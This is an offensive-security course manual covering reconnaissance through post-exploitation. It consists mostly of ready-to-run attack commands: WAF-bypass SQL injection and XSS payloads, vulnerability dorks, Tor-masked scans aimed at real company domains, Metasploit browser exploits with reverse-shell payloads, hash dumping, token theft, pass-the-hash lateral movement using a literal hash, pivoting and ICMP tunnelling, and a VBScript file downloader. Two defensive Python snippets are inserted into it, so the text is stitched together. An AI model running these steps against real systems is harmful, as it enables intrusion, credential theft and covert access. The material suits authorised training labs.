CyberWar-AOCO-2014

Strategic Security, Inc. © http://strategicsec.com/

CyberWar: Advanced Offensive Cyber Operations

Written by Joe McCray


This Page Intentionally Left Blank ... 6

Section 1: Attacking From The Outside ... 7

Lab 1: Target IP Determination ... 7

Lab 1a: Blindcrawl ... 7

Lab 1b: Fierce ... 8

Lab 1c: GXFR ... 9

Lab 1d: IP Crawl ... 10

Lab 2: Identifying Security Mechanisms ... 14

Lab 2a: LBD ... 14

Lab 2b: Halberd ... 15

Lab 2c: OSSTMM ... 18

Lab 2d: SSLTEST ... 19

Lab 3: Dealing With Web Application Firewalls ... 21

Lab 3a: Web Application Firewall Detection ... 21

Lab 3b: WAF Bypass SQL Injection Payloads ... 22

Lab 3c: WAF Bypass Cross Site Scripting Payloads ... 23

Lab 4: Quick Hits (Googling for vulnerabilities) ... 24

Lab 4a: Google for generic Database errors ... 24

Lab 4b: Google for generic RFIs ... 24

Lab 4c: Check for XSS at xssed.com ... 25

Lab 5: 3rd Party Scanning and scanning via proxies ... 25

Lab 5a: Shodan... 26

Lab 5b: Proxyfinder.pl ... 26

Lab 5c: Tor/Tor-resolve ... 27

Lab 5d: Proxychains/Proxyresolv... 28


Lab 7: Burp Suite ... 34

Lab 7a: Burp Suite Through Tor/Privoxy ... 40

Lab 7b: Masking Nikto Headers ... 44

Lab 8: Tor Through an SSH Tunnel ... 49

Section 2: Attacking The Internal Network ... 59

Lab 9: Email Address Harvesting ... 62

Lab 10: Browser Fingerprinting ... 68

Lab 10a: Central Ops ... 68

Lab 10b: Metasploit ... 71

Lab 11: Client-Side Enumeration ... 73

Lab 11a: Getting your shell ... 73

Lab 11b: Figure out who and where you are ... 75

Lab 11c: Escalate privileges and get hashes ... 76

Lab 11d: Enumerate the host you are on ... 79

Lab 11e: Steal Tokens ... 83

Lab 11f: Prove access ... 86

Lab 11g: Enumerate the network you are on ... 87

Lab 11h: Set up your Pivot ... 89

Lab 11i: Now set up Pivot with a route add ... 90

Lab 11j: Scan through your Pivot ... 90

Lab 11k: Lateral movement through your Pivot ... 91

Lab 11l: Pivot Persistence ... 92

Lab 11m: Set up a Socks Proxy through your Pivot ... 97

Lab 11n: SSH Tunneling ... 99

Lab 11o: VPN Pivot ... 101

Lab 11p: ICMP Tunneling ... 104

Lab 11q: IPv6 to IPv4 Tunnel ... 106

Lab 12: VBScript For Post Exploitation ... 108

Lab 12a: Identifying the IP Address ... 108

Lab 12b: Download a file from the internet ... 109


Lab 13a: Reverse Shell with Powershell ... 111

Lab 13b: Payload which could execute shellcode from DNS TXT queries. ... 112

Lab 13c: Run mimikatz via powershell (must be run as SYSTEM) ... 113

Lab 13d: Token Manipulation to escalate (must be run as an Administrator) ... 114

Lab 13e: Nishang payload which scans IP-Addresses, Ports and HostNames ... 115

Lab 13f: Nishang Payload which gathers juicy information from the target. ... 116

Lab 13g: Nishang Payload which logs keys. ... 116

Lab 13h: Nishang Payload which silently browses to a URL and accepts Java Applet Run Warning ... 118

Lab 13i: Nishang Payload which dumps keys for WLAN profiles. ... 118

Lab 14: SchTasks for Powershell ... 122

Lab 15: Host Enumeration ... 129

Lab 16: Credential Harvesting & Data-Mining ... 139

Lab 17: Life without metasploit... 160


Section 1: Attacking From The Outside

Lab 1: Target IP Determination

Lab 1a: Blindcrawl

cd ~/toolz


Lab 1b: Fierce

cd ~/toolz/fierce2


Lab 1c: GXFR

cd ..

python gxfr.py --bxfr --dns-lookup -o motorola.com

Enter Domain Name: motorola.com


Lab 1d: IP Crawl

DNS forward lookup against a given IP range:

cd ~/toolz/


Lab 2: Identifying Security Mechanisms

Lab 2a: LBD

cd ~/toolz


Lab 2b: Halberd


Lab 2c: OSSTMM


Lab 2d: SSLTEST

cd toolz/
cat /etc/xinetd.d/ssltest
cat /home/strategicsec/toolz/ssl_proxy.sh


Lab 3: Dealing With Web Application Firewalls

Lab 3a: Web Application Firewall Detection

WAF Detection

cd ~/toolz/wafw00f

python wafw00f.py http://www.oracle.com

cd ~/toolz/


Lab 3b: WAF Bypass SQL Injection Payloads

Go to the address below in firefox:

http://www.modsecurity.org/demo/crs-demo.html

Insert the following payloads and keep track of the score each payload receives.

SQL Injection Payloads

' or 1=1--

' or 1=1--

%27%201=1%2D%2D

' and 8<9--

%27%20and%208<9%2D%2D


Lab 3c: WAF Bypass Cross Site Scripting Payloads

<script>alert('xss')</script>

%3Cscript%3E%28%27xss%27%29%3C$2Fscript%3E

prompt('xss')
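The scores in Labs 3b and 3c differ between the raw and percent-encoded forms of the same payload because a filter that matches before decoding sees different bytes. The following Python is an added example (not from the course and not the ModSecurity CRS demo's logic) of a normalizing check: it percent-decodes repeatedly, then applies the same patterns to both forms. The sample strings are constructed from the payloads listed above; the patterns, the double-encoded variant and the benign control are my own assumptions.

```python
import re
from urllib.parse import unquote

# Constructed test strings: the SQL injection and XSS payloads from Labs 3b and 3c, each in
# the raw form and the percent-encoded form the lab submits, plus a double-encoded variant
# and a benign control (the last two are my additions).
SAMPLES = [
    "' or 1=1--",
    "%27%201=1%2D%2D",
    "' and 8<9--",
    "%27%20and%208<9%2D%2D",
    "<script>alert('xss')</script>",
    "%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E",
    "prompt('xss')",
    "%253Cscript%253E",
    "SELECT name FROM users WHERE id = 5",
]

# Deliberately small signature sets; a real rule set (such as the CRS demo scores) is far larger.
SQLI_PATTERNS = [
    re.compile(r"'\s*(or|and)\s+\d+\s*[=<>]\s*\d+", re.I),  # ' or 1=1 / ' and 8<9
    re.compile(r"--\s*$"),                                   # trailing SQL comment
]
XSS_PATTERNS = [
    re.compile(r"<\s*script\b", re.I),
    re.compile(r"\b(alert|prompt|confirm)\s*\(", re.I),
]


def normalize(value, max_rounds=3):
    """Percent-decode until the string stops changing (bounded, so a pathological input
    cannot loop), then collapse whitespace and lowercase. Matching on this form is what
    makes '%27%201=1%2D%2D' and "' 1=1--" score the same."""
    current = value
    for _ in range(max_rounds):
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
    return re.sub(r"\s+", " ", current).strip().lower()


def classify(value, normalize_first=True):
    """Return the set of classes ('sqli', 'xss') whose patterns match the input."""
    text = normalize(value) if normalize_first else value
    hits = set()
    if any(p.search(text) for p in SQLI_PATTERNS):
        hits.add("sqli")
    if any(p.search(text) for p in XSS_PATTERNS):
        hits.add("xss")
    return hits


def compare(samples=SAMPLES):
    """For each sample: (input, hits without decoding, hits after normalizing).
    Rows where the first set is empty and the second is not are the encoding evasions."""
    return [(s, classify(s, normalize_first=False), classify(s)) for s in samples]


if __name__ == "__main__":
    for sample, raw_hits, norm_hits in compare():
        print(f"{sample!r:55} raw={sorted(raw_hits)} normalized={sorted(norm_hits)}")
```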


Lab 4: Quick Hits (Googling for vulnerabilities)

Using Google for finding vulnerabilities

Lab 4a: Google for generic Database errors

site:example.com "Microsoft OLE DB Provider for SQL Server"
site:example.com "Microsoft JET Database Engine"
site:example.com "Type mismatch"
site:example.com "You have an error in your SQL syntax"
site:example.com "Invalid SQL statement or JDBC"
site:example.com "DorisDuke error"
site:example.com "OleDbException"
site:example.com "JasperException"
site:example.com "Fatal Error"
site:example.com "supplied argument is not a valid MySQL"
site:example.com "mysql_"
site:example.com ODBC
site:example.com JDBC
site:example.com ORA-00921
site:example.com ADODB

Lab 4b: Google for generic RFIs

site:example.com ".php" "file="
site:example.com ".php" "folder="
site:example.com ".php" "path="
site:example.com ".php" "style="
site:example.com ".php" "template="
site:example.com ".php" "PHP_PATH="
site:example.com ".php" "doc="
site:example.com ".php" "document="
site:example.com ".php" "document_root="
site:example.com ".php" "pg="
site:example.com ".php" "pdf="
site:example.com ".php" "page="
site:example.com ".php" "inc="
site:example.com ".php" "dir="
site:example.com ".php" "frame="
site:example.com ".php" "swf="
site:example.com ".php" "host="


Lab 4c: Check for XSS at xssed.com


Lab 5: 3rd Party Scanning and scanning via proxies

Lab 5a: Shodan

http://www.shodanhq.com/

Create an account and log in. You must have an account to use filters.

net:129.188.8.0/24

Lab 5b: Proxyfinder.pl

Proxyfinder.pl is a perl script that will scrape “multiproxy” or “samair” to get you as many proxies as you specify. You can then use these proxies with Proxychains.


This step takes some time, upwards of an hour. It has to go through every proxy and make sure that it is alive. Once it’s done, copy the contents of your results.txt file into your /etc/proxychains.conf. Make sure to paste them into the appropriate section.

Lab 5c: Tor/Tor-resolve

We can even use tor-resolve to resolve host name information.

tor &

(this starts TOR - it should already be running on your VM)

Open up another tab to resolve the hostname:

tor-resolve strategicsec.com


Lab 5d: Proxychains/Proxyresolv

Proxychains is in the repositories for many of the current Linux distros. Let’s see what we can do. Start tor, then run the following command:

proxyresolv <hostname>

Proxyresolv is used to resolve host names via a proxy or TOR. Now let’s port scan a machine through proxychains:

proxychains nmap -sT -PN -n -sV -p 21,22,23,25,80,110,139,443,445,1433,1521,3306,3389,8080,10000 [ip address/ip range]


We can even run Nikto through proxychains:

cd toolz/nikto-2.1.1/

proxychains perl nikto.pl -Cgidirs all -o google_nikto.txt -host www.google.com

Lab 5e: Port scanning through PHP proxies

In previous labs we’ve seen the use of the SOCKS proxy. In this lab we will be looking at a trend that seems to be growing in popularity, PHP proxies. Sensepost has a tool called “glypeahead” that allows us


Download the tool from: http://www.sensepost.com/research/glypeahead/

Once you’ve downloaded and unzipped the file you will be greeted with a directory containing 3 files and a directory. What we are really interested in is the config.php and the application itself.

The config.php file is where you will specify what site you would like to scan.

It’s in this section that you can also specify what ports you want glypeahead to scan. At the bottom of the configuration file, you can also specify what proxies you would like glypeahead to use.

You can get a list of glype proxies from the following link: http://www.azproxies.com/proxy-lists/glype-web-proxies.html


Of course, you can always add more proxies. You do not have to limit yourself to only two. The same goes for the sites, you can always change the ports to whatever you want to scan for. I left them the same for simplicity. This is what you’ll get when everything works out fine.


Lab 6: Nessus through Tor

Register & Download Nessus

Register for a free account to download a copy of HomeFeed Nessus vulnerability scanner at http://www.nessus.org/products/nessus/nessus-download-agreement

Installing Nessus

This installation is performed on the Ubuntu x86 machine. Follow the instructions to install Nessus on other platforms

Initial Account Setup

Open a browser on your machine and go to https://localhost:8834

You will be asked to create an administrative account to manage Nessus. In this example, we will create an account “admin” with the password “password1”. Click “Next” and proceed with the rest of the setup process.

After Nessus has been installed, execute the following command to tunnel all incoming connections to the target address via Tor’s SOCKS server:

socat TCP4-LISTEN:8080,fork SOCKS4:127.0.0.1:<target ip address>:80,socksport=9050

Now run a Nessus scan against “localhost”


Lab 7: Burp Suite

Download the latest free version of Burp at http://www.portswigger.net/burp/download.html

java -jar burpsuite_free_v1.5.jar

- Click the "Proxy" tab
- Click the "Options" sub tab
- Select the proxy listener and click on “Edit”. Go to the Certificate tab. Ensure that Burp is configured to "generate CA-signed per-host certificates"

Open Firefox

- Click "Edit"
- Click “Preferences"
- Click the "Advanced" tab
- Click the "Network" sub tab
- Click the connection "settings" button
- Click "manual proxy configuration"
- Set it to 127.0.0.1 port 8080
- Check "Use this proxy server for all protocols"


Configure your browser to use Burp as its proxy, and configure Burp's proxy listener to generate CA-signed per-host certificates.

Visit any SSL-protected URL.

On the “This Connection is Untrusted” screen, click on “Add Exception”. Click "Get Certificate", then click "View".

In the “Details” tab, select the root certificate in the tree (PortSwigger CA).


Close the Certificate Viewer dialog and click “Cancel” on the “Add Security Exception” dialog.

Go to Edit | Preferences.

Click “Advanced” and go to the “Encryption” tab.

Click “View Certificates”.


On the "Downloading Certificate" dialog, check the box "Trust this CA to identify web sites", and click "OK".

Close all dialogs and restart Firefox.

Lab 7a: Burp Suite Through Tor/Privoxy

Since we’ve already installed Tor and configured it, privoxy should be working fine. But we need to configure a few things before everything will work properly.


Once you’ve found the line that says “forward-socks5 / 127.0.0.1:9050”, go ahead and uncomment it. Now we need to configure the proxy settings.

If you are using Burp v1.5 the proxy settings are under the “options” tab.

We need to set this up to go through Privoxy. Currently Privoxy listens on port 8118 by default. Scroll down until you see the section labeled “upstream proxy servers”, fill in the “proxy host” with the localhost address “127.0.0.1”. Use “8118” for the “proxy port”. Click on the “add” button when finished.


Once you’re finished with this, the final step is to fire up Tor and Privoxy.

Lab 7b: Masking Nikto Headers

In this lab we are going to be masking the Nikto User-Agent in the request header. Navigate to the directory where you’ve stored Nikto. In this directory you’ll notice a nikto.conf file.

Open up the config file in your favorite text editor and look for the lines referencing proxy options.

Uncomment the two lines for “PROXYHOST” and “PROXYPORT”. You will also have to change the “PROXY” port so that Nikto goes through Burp.


Now, to modify Nikto’s User-Agent we need the “mechanize.rb” rubygem. If you are on Fedora you can simply use yum to install it. If not, you can download it at (http://mechanize.rubyforge.org) or use the command:

sudo gem install mechanize

If you’ve installed it via gem install then navigate to “/usr/lib//gems/1.8/gems/mechanize-2.5.1/lib/”.

In the mechanize.rb file you can see the different user agents. From this list we need to make a separate user-agent.txt file. You may want to clean it up a little bit.

Now we can change the user-agent. Go into Burp and navigate to Proxy -> Options and scroll down to “Match and Replace.”


Just copy and paste in the user-agent information from your user-agent.txt file. I am going to use the Mac Firefox user-agent.


Once you navigate to a web page, you should see the activity under the “Proxy” tab and then under the “Intercept” tab:
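As an added defender-side counterpart to this lab (example code, not part of the course or of Nikto), the Python below runs two detections over constructed Apache combined-format log lines: a User-Agent signature check, which the Match and Replace rule above defeats, and a behaviour check on error ratio and path diversity per client, which still fires once the User-Agent has been swapped for the Mac Firefox string. The log lines, IP addresses, User-Agent strings and thresholds are constructed assumptions.

```python
import re
from collections import defaultdict

# Apache "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed log lines (assumption, not real traffic): 10.0.0.5 runs Nikto with a
# scanner-style User-Agent, 10.0.0.9 sends the same checks behind the Mac Firefox
# User-Agent substituted in Burp, and 10.0.0.20 is an ordinary browsing session.
FIREFOX_MAC = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:20.0) Gecko/20100101 Firefox/20.0"
NIKTO_UA = "Mozilla/5.00 (Nikto/2.1.1) (Evasions:None) (Test:000001)"
SAMPLE_LOG = "\n".join([
    f'10.0.0.5 - - [10/Mar/2014:12:00:01 +0000] "GET /cgi-bin/ HTTP/1.1" 404 210 "-" "{NIKTO_UA}"',
    f'10.0.0.5 - - [10/Mar/2014:12:00:01 +0000] "GET /admin/ HTTP/1.1" 404 210 "-" "{NIKTO_UA}"',
    f'10.0.0.5 - - [10/Mar/2014:12:00:02 +0000] "GET /phpinfo.php HTTP/1.1" 404 210 "-" "{NIKTO_UA}"',
    f'10.0.0.5 - - [10/Mar/2014:12:00:02 +0000] "GET /backup.zip HTTP/1.1" 404 210 "-" "{NIKTO_UA}"',
    f'10.0.0.9 - - [10/Mar/2014:12:05:00 +0000] "GET /cgi-bin/ HTTP/1.1" 404 210 "-" "{FIREFOX_MAC}"',
    f'10.0.0.9 - - [10/Mar/2014:12:05:00 +0000] "GET /admin/ HTTP/1.1" 404 210 "-" "{FIREFOX_MAC}"',
    f'10.0.0.9 - - [10/Mar/2014:12:05:01 +0000] "GET /phpinfo.php HTTP/1.1" 404 210 "-" "{FIREFOX_MAC}"',
    f'10.0.0.9 - - [10/Mar/2014:12:05:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "{FIREFOX_MAC}"',
    f'10.0.0.20 - - [10/Mar/2014:12:10:00 +0000] "GET / HTTP/1.1" 200 5120 "-" "{FIREFOX_MAC}"',
    f'10.0.0.20 - - [10/Mar/2014:12:10:03 +0000] "GET /about.php HTTP/1.1" 200 4096 "http://example.test/" "{FIREFOX_MAC}"',
    f'10.0.0.20 - - [10/Mar/2014:12:10:09 +0000] "GET /missing.css HTTP/1.1" 404 210 "http://example.test/" "{FIREFOX_MAC}"',
])


def parse(log_text):
    """Parse combined-format lines into dicts; lines that do not match are skipped."""
    entries = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            entries.append(m.groupdict())
    return entries


def ua_signature_hits(entries, markers=("nikto",)):
    """Clients identified purely by scanner tokens in the User-Agent.
    This is exactly what the Burp Match and Replace rule removes."""
    return {e["ip"] for e in entries if any(t in e["ua"].lower() for t in markers)}


def behavioral_hits(entries, min_requests=4, min_error_ratio=0.75):
    """Clients flagged by behaviour: at least min_requests requests over as many distinct
    paths with a 4xx share of min_error_ratio or more. The User-Agent is not consulted,
    so swapping it for a browser string does not help the scanner here."""
    per_ip = defaultdict(lambda: {"n": 0, "errors": 0, "paths": set()})
    for e in entries:
        s = per_ip[e["ip"]]
        s["n"] += 1
        s["paths"].add(e["path"])
        if e["status"].startswith("4"):
            s["errors"] += 1
    return {
        ip for ip, s in per_ip.items()
        if s["n"] >= min_requests
        and len(s["paths"]) >= min_requests
        and s["errors"] / s["n"] >= min_error_ratio
    }


def report(log_text):
    """Run both detections and return which clients each one caught."""
    entries = parse(log_text)
    return {"by_user_agent": ua_signature_hits(entries), "by_behaviour": behavioral_hits(entries)}


if __name__ == "__main__":
    for method, ips in report(SAMPLE_LOG).items():
        print(f"{method}: {sorted(ips)}")
```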


Lab 8: Tor Through an SSH Tunnel

Before we get started we need to make sure that TOR is using the default port and listen address. Navigate to /etc/tor and open up the torrc file. You should see:

SocksPort 9050

SocksListenAddress 127.0.0.1

If your torrc file looks like this then we can go on. This next step depends on whether you are using openssh or putty. If you’re using openssh, then this step is pretty easy.

Let’s say you have two machines, Host1 and Host2. Host2 will be the PC that you’re wanting to route traffic from and Host1 is the PC that is running Tor. From Host2, run:

ssh -L 9050:127.0.0.1:9050 user@Host1

Now that we’ve logged in, the tunnel is active. So if we connect to localhost:9050 on Host2, a connection to our other machine (Host1) will be established: we get redirected to our Linux machine through an encrypted SSH tunnel. If we configure Firefox on Host2 to use 127.0.0.1:9050 as a SOCKS proxy, our traffic will be tunneled through the SSH tunnel to Host1 and out over Tor.


The procedure on your Windows machine is pretty much the same, just more GUI based. First, open up PuTTY.


Under “Select Mode”, choose “Use Proxy 127.0.0.1 for all URL’s”.

There is a problem doing this. By default Firefox uses your local DNS, even if you use SOCKS. So you have to tell Firefox to request everything through SOCKS. To do this, open a new tab in Firefox and type “about:config”. In the filter field type “network.proxy.socks_remote_dns”. If this value is not set to “true”, set it to “true”. Now check whether you’re surfing anonymously.


Section 2: Attacking The Internal Network

You can download the attack virtual machine from here:

https://s3.amazonaws.com/StrategicSec-VMs/Strategicsec-Ubuntu-VPN-163.zip

user: strategicsec

pass: strategicsec

STRATEGICSEC-Ubuntu VPN Setup

You will need your vpn username and password provided by Joseph McCray, in order to complete this installation.

Login to the Strategic-Ubuntu vm with user/pass: strategicsec/strategicsec

You’ll be presented with an empty desktop. Open a Terminal window by holding down [Ctrl+Alt] and then pressing T, or find it through the left sidebar by clicking on Dash home, then typing “terminal” in the search bar and selecting “Terminal”.

At the newly open Terminal window, type the command: vpn

Enter the password for the strategicsec user here.

The VPN service will start and will ask you for your username, then your password. This is the Username and Password that has been provided to you by Joe McCray.


At this point you’ll see a bunch of text while the VPN service connects.

When this completes, you can open another Terminal window or tab and type the command:

ifconfig

This will show you all of your network interfaces and you can verify that a tap0 interface has been created and you have been assigned an IP address in the lab.

Congratulations you are ready to begin working in the Strategic Security Lab!

When you are ready to disable your VPN connection to the Lab network, you can issue a command to disable the tap0 VPN interface:

sudo ifconfig tap0 down


Afterward you can verify the connection is down by typing ifconfig to show the network interfaces that are up and by attempting to ping a previously known Lab ip address.

Lab 9: Email Address Harvesting

cd ~/toolz/
svn checkout http://theharvester.googlecode.com/svn/trunk/
cd theharvester-read-only/


python theHarvester.py -d motorola.com -l 50 -b linkedin


Lab 10: Browser Fingerprinting

Lab 10a: Central Ops

From your host machine, browse to 'http://centralops.net/' and click on Browser Mirror.

cd /var/www
sudo wget https://s3.amazonaws.com/StrategicSec-Files/browser-fingerprint.zip
sudo unzip browser-fingerprint.zip
sudo touch browser.log
chmod 777 browser.log
cat config.php


tail -f /var/www/browser.log

****See the browser version that connects to your server****

ctrl-z


sudo vi config.php

****change this line****

define('DEFAULT_REDIRECT', 'http://google.com');

****to this****


Lab 10b: Metasploit

cd ~/toolz/metasploit
sudo ./msfconsole
use exploit/windows/browser/ie_cgenericelement_uaf
set ExitOnSession false
set URIPATH /attack
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST StrategicSec-Ubuntu-Tap0-IP
exploit -j


Lab 11: Client-Side Enumeration

Lab 11a: Getting your shell

echo yourname > /home/strategicsec/yourname.txt
cd /home/strategicsec/toolz/metasploit
./msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set ExitOnSession true
set LHOST StrategicSec-Ubuntu-Tap0-IP
set LPORT 7777


exploit -j

Now you should only have to wait a few minutes and then you should see an incoming meterpreter session.

We'll simulate having spear-phished a victim.

After that you should see metasploit sending the exploit to the IP address of a Windows 7 host, and after that you should see a new session created.

You can list the active sessions by typing: sessions -l

You can "interact" with any active session by typing sessions -i 3 (replace 3 with the session number you want to interact with)

sessions -i 1


Lab 11b: Figure out who and where you are

meterpreter> sysinfo


meterpreter> ipconfig

meterpreter> run post/windows/gather/checkvm

meterpreter> run get_local_subnets


Lab 11c: Escalate privileges and get hashes

meterpreter> getsystem

meterpreter> getuid


meterpreter> run post/windows/gather/hashdump

meterpreter> rev2self

meterpreter> getuid

Lab 11d: Enumerate the host you are on


meterpreter> run winenum

meterpreter > run post/windows/gather/enum_applications


meterpreter > run post/windows/gather/enum_shares

meterpreter> reg enumkey -k HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run

Lab 11e: Steal Tokens

meterpreter > getsystem

meterpreter > list_tokens -g

meterpreter > impersonate_token BUILTIN\\Users <-- choose who you want to impersonate but be sure to use 2 slashes in the name (ex: impersonate_token domain\\user)


meterpreter> rev2self

Lab 11f: Prove access

meterpreter> upload /home/strategicsec/yourname.txt c:\\

meterpreter > timestomp C:\\yourname.txt -v

meterpreter > timestomp C:\\yourname.txt -v

Lab 11g: Enumerate the network you are on


meterpreter > run post/windows/gather/arp_scanner RHOSTS=10.10.30.0/24

Lab 11h: Set up your Pivot

meterpreter > background <-- background the session

You want to get back to this prompt: msf exploit(handler) >

back <--- you need to get to the main msf > prompt

sessions -l <-- Find a session you want to pivot through (note the IP and session


Lab 11i: Now set up Pivot with a route add

route print

route add 10.10.30.50 255.255.255.0 28 <-- Use correct session id (2), it may be 3, or 4

route print

route remove 10.10.30.50 255.255.255.0 28 <-- Use correct session id (2), it may be 3, or 4

route print <--- verify new route

Lab 11j: Scan through your Pivot

use auxiliary/scanner/portscan/tcp <-- Run aux modules through your pivot

set THREADS 10

set RHOSTS 10.10.30.60-70 <-- Keep changing this IP range and re-running the scan until you find something you want to attack

set RPORTS 445


Lab 11k: Lateral movement through your Pivot

use exploit/windows/smb/psexec
set SMBUser Administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:cffcd2a85b83b1566e6a785a33f5d0cf
set payload windows/meterpreter/reverse_tcp
set RHOST 10.10.30.63
set LHOST 10.10.5.235
set LPORT 5678


Lab 11l: Pivot Persistence

***Update Metasploit installation
***make two meterpreter sessions

use exploit/windows/smb/psexec
set SMBUser Administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:cffcd2a85b83b1566e6a785a33f5d0cf
set RHOST 10.10.30.87
set LPORT 5678
set LHOST StrategicSec-Ubuntu-Tap0-IP
exploit


background

set RHOST 10.10.30.81
exploit

background
use post/windows/manage/portproxy
sessions -l
set session 2
set local_port 9001
set local_address 0.0.0.0
set connect_port 9002
set connect_address 10.10.30.87
run
set session 1
set local_port 9002
set local_address 0.0.0.0
set connect_port 80
set connect_address 10.10.10.105
run


test proxy


Lab 11m: Set up a Socks Proxy through your Pivot

use auxiliary/server/socks4a
set SRVHOST 127.0.0.1
set SRVPORT 1080
run


Open a new terminal

sudo vi /etc/proxychains.conf

Comment out the proxy_dns, change the 9050 (tor port) to the metasploit socks proxy port (1080) and save it.

socks4 127.0.0.1 1080

proxychains nmap -sT -PN -vv -sV --script=smb-os-discovery.nse -p 445 10.10.30.0/24

proxychains nmap -sT -PN -n -sV -p 21,22,23,25,80,110,139,443,1433,1521,3306,3389,8080,10000 10.10.30.0/24


Lab 11n: SSH Tunneling

sudo vi /etc/proxychains.conf


Check the proxychains connection with:

proxychains wget 10.10.10.105

(not working)

Connect to SSH.

pass: mysql123

Open a new terminal and check the connection again.

Lab 11o: VPN Pivot

use exploit/multi/ssh/sshexec
set PASSWORD mysql123
set RHOST 10.10.10.107
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 10.10.5.235
set LPORT 4444
exploit


meterpreter > portfwd add -l 2222 -p 22 -r 127.0.0.1
background
route add 10.10.10.0 255.255.255.0 1
sudo apt-get install sshuttle
sudo sshuttle -vr [email protected]:2222 0/0
password: mysql123


Lab 11p: ICMP Tunneling

Open msfconsole:

use exploit/windows/smb/psexec
set payload windows/meterpreter/reverse_tcp
set rhost 10.10.30.63
set lhost 10.10.5.235
set SMBUser Administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:cffcd2a85b83b1566e6a785a33f5d0cf
exploit

Open a second console:

cd ~/toolz
git clone https://github.com/inquisb/icmpsh.git
cd icmpsh

From the meterpreter session:

meterpreter > getwd
C:\Windows\system32
meterpreter > getlwd
/home/strategicsec/toolz/metasploit
meterpreter > lcd ../icmpsh
meterpreter > getlwd
/home/strategicsec/toolz/icmpsh
meterpreter > upload icmpsh.exe
[*] uploading : icmpsh.exe -> icmpsh.exe
[*] uploaded : icmpsh.exe -> icmpsh.exe


meterpreter > shell

C:\Windows\system32>icmpsh.exe -t 10.10.5.235 -d 500 -b 30 -s 128

Exit from the shell and the meterpreter session and return to the second console:

sudo sysctl -w net.ipv4.icmp_echo_ignore_all=1
sudo python icmpsh_m.py 10.10.5.235 10.10.30.63
ipconfig


Lab 11q: IPv6 to IPv4 Tunnel

Go to http://tunnelbroker.net and sign up for an account. You will be emailed your account credentials.

route print
netsh
interface ipv6 show interfaces


add v6v4tunnel IP6Tunnel 192.168.1.9 216.218.224.42
add address IP6Tunnel 2001:470:1f0e:d9f::2
add route ::/0 IP6Tunnel 2001:470:1f0e:d9f::1

Reference:

http://www.cellstream.com/intranet/tipsandtricks/160-setting-up-a-6to4-tunnel-in-windows-7.html

IPv6 Direct Access

Reference:

http://www.slideshare.net/AlexdeJong/direct-access-for-dummies


Lab 12: VBScript For Post Exploitation

Lab 12a: Identifying the IP Address

What is my external IP address?

echo Dim joe > ip.vbs
echo Set joe = CreateObject("MSXML2.XMLHTTP") >> ip.vbs
echo joe.open "GET", "http://icanhazip.com", False >> ip.vbs
echo joe.send >> ip.vbs
echo WScript.StdOut.Write joe.responseText >> ip.vbs


Lab 12b: Download a file from the internet

echo 'Barabas pure vbs downloader - tested on XP sp2' > vbs_download.vbs
echo 'Microsoft fixed adodbstream but guess what :)' >> vbs_download.vbs
echo '(c)dec 2004 >> vbs_download.vbs
echo 'First argument = complete url to download >> vbs_download.vbs
echo 'Second Argument = filename you want to save' >> vbs_download.vbs
echo 'thnks to http://www.ericphelps.com/scripting/samples/BinaryDownload/' >> vbs_download.vbs
echo 'v2 - now includes proxy support for the winhttp request stuff' >> vbs_download.vbs
echo strUrl = WScript.Arguments.Item(0) >> vbs_download.vbs
echo StrFile = WScript.Arguments.Item(1) >> vbs_download.vbs
echo 'WinHttpRequest proxy settings. >> vbs_download.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> vbs_download.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> vbs_download.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> vbs_download.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> vbs_download.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> vbs_download.vbs
echo Err.Clear >> vbs_download.vbs
echo Set http = Nothing >> vbs_download.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> vbs_download.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> vbs_download.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> vbs_download.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> vbs_download.vbs
echo ' comment out next line if no proxy is being used >> vbs_download.vbs
echo ' and change the proxy to suit ur needs -duh >> vbs_download.vbs
echo 'http.SetProxy HTTPREQUEST_PROXYSETTING_PROXY, "someproxy:8080" >> vbs_download.vbs
echo http.Open "GET", strURL, False >> vbs_download.vbs
echo http.Send >> vbs_download.vbs
echo varByteArray = http.ResponseBody >> vbs_download.vbs
echo Set http = Nothing >> vbs_download.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> vbs_download.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> vbs_download.vbs
echo strData = "" >> vbs_download.vbs
echo strBuffer = "" >> vbs_download.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> vbs_download.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> vbs_download.vbs
echo Next >> vbs_download.vbs
echo ts.Close >> vbs_download.vbs

more vbs_download.vbs


Lab 13: Running Powershell From A Command Prompt

Lab 13a: Reverse Shell with Powershell

sudo ./msfconsole
use exploit/multi/handler
set ExitOnSession false
set payload windows/meterpreter/reverse_https
set LHOST 10.10.5.235
set LPORT 443
set EXITFUNC thread
exploit -j

